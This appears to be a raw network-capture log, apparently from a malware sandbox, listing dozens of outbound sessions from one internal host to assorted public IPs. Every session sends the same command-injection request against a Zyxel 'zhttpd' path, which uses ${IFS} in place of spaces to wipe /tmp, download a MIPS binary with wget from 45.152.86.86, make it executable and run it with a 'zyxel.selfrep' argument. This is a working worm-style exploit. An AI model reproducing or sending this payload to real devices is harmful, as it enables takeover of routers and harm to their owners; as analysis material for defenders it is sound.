                                        Mar 31, 2024 09:21:49.224128962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5938192.168.2.2359278208.50.142.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.224190950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5939192.168.2.235686220.207.246.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.224261999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5940192.168.2.2338302192.151.138.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.224345922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5941192.168.2.234617098.120.37.149443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.224400997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5942192.168.2.234113813.77.237.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.224503994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5943192.168.2.233487064.231.114.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.224555016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5944192.168.2.235716641.65.43.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.224639893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5945192.168.2.2358938186.244.24.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.224706888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5946192.168.2.234275687.92.161.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.224796057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5947192.168.2.234188262.179.93.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.224848032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5948192.168.2.234765669.72.192.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.224922895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5949192.168.2.2356738190.201.228.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.224981070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5950192.168.2.233310812.160.20.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.225052118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5951192.168.2.2347854113.34.5.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.225114107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5952192.168.2.2357564171.79.75.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.225198030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5953192.168.2.2335916129.226.54.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.225249052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5954192.168.2.2356900218.71.94.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.225353003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5955192.168.2.2353538177.143.79.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.225429058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5956192.168.2.2350136134.84.100.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.225478888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5957192.168.2.234043451.152.51.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.225553989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5958192.168.2.2355406185.21.146.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.225615978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5959192.168.2.2357996104.108.238.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.225693941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5960192.168.2.2360322192.12.37.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.225779057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5961192.168.2.2339346166.21.61.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.225835085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5962192.168.2.233986014.245.250.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.225915909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5963192.168.2.234195262.39.178.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.225995064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5964192.168.2.233566854.169.48.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.226059914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5965192.168.2.234256031.19.10.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.226119995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5966192.168.2.233962677.55.89.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.226206064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5967192.168.2.2338582112.132.157.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.226253986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5968192.168.2.235644078.32.201.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.226327896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5969192.168.2.233662065.254.41.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.226378918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5970192.168.2.234880886.250.144.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.226463079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5971192.168.2.23348284.36.126.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.226512909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5972192.168.2.235555283.72.105.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.226578951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5973192.168.2.2341708110.185.116.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.226649046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5974192.168.2.234182297.31.74.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.226717949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5975192.168.2.2335082149.158.240.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.226771116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5976192.168.2.2348082202.116.48.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.226850033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5977192.168.2.234176063.247.185.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.226932049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5978192.168.2.2345652216.241.5.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.226984024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5979192.168.2.233890679.240.249.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.227066040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5980192.168.2.2351010217.162.36.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.227114916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5981192.168.2.234059839.194.236.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.227164984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5982192.168.2.234649036.56.247.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.227233887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5983192.168.2.2345940149.167.88.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.227292061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5984192.168.2.235507235.146.158.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.227380991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5985192.168.2.2345402202.73.98.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.227430105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5986192.168.2.2338506209.15.105.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.227494955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5987192.168.2.2335688180.190.64.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.227576971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5988192.168.2.233662413.120.75.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.227660894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5989192.168.2.2342238149.185.0.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.227741003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5990192.168.2.2346412182.188.152.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.227814913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5991192.168.2.2358394101.133.50.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.227864981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5992192.168.2.235034440.176.126.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.227948904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5993192.168.2.233873473.137.74.195443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.228012085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5994192.168.2.2334820101.133.110.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.228081942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5995192.168.2.234302419.250.215.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.228152990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5996192.168.2.2339984167.199.163.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.228243113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5997192.168.2.2334792122.142.47.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.228310108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5998192.168.2.234809691.1.225.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.228395939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5999192.168.2.2344184223.17.227.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.228451014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6000192.168.2.234291681.146.132.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.228540897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6001192.168.2.2349122178.199.34.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.228600025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6002192.168.2.234966871.32.84.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.228662014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6003192.168.2.2356992206.9.158.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.228754044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6004192.168.2.2335218187.161.161.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.228805065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6005192.168.2.2351834107.152.192.14443
                                        TimestampBytes transferredDirectionData
